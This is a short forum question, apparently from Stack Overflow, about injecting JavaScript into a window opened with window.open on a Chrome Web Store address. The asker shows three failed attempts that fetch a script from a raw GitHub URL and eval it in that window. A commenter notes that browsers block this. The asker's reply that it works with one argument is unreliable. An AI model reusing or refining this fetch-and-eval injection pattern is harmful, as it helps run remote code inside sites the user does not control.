# running code in a window.open does not work

Tags: javascript, html, eval, code-injection, window.open

i am trying to inject code into a window.open and whatever i try it never works
i am trying to inject this code: https://raw.githubusercontent.com/phillipbruh/snowplus/main/idk
into: https://chrome.google.com/webstorex

Hi, i am trying to inject code into a window.open and whatever i try it never works

`newWin = window.open("https://chrome.google.com/webstorex");`

this is what i have tried:

1:
`newWin.window.open("javascript:fetch('https://raw.githubusercontent.com/phillipbruh/snowplus/main/idk').then(function (response) {response.text().then(function (text) {eval(text);}); });", "_self");`

2:
`newWin.fetch("https://raw.githubusercontent.com/phillipbruh/snowplus/main/idk").then(data=>  {data.text().then(text=>{eval(text)})})`

3:
`newWin.eval("javascript:fetch('https://raw.githubusercontent.com/phillipbruh/snowplus/main/idk")`

i have also tried injecting into iframes and using delays but delays do not work

Comment: Browsers are not going to let you inject code into other websites you open.

Comment: you can with window.open() it just only works with 1 argument and im not sure why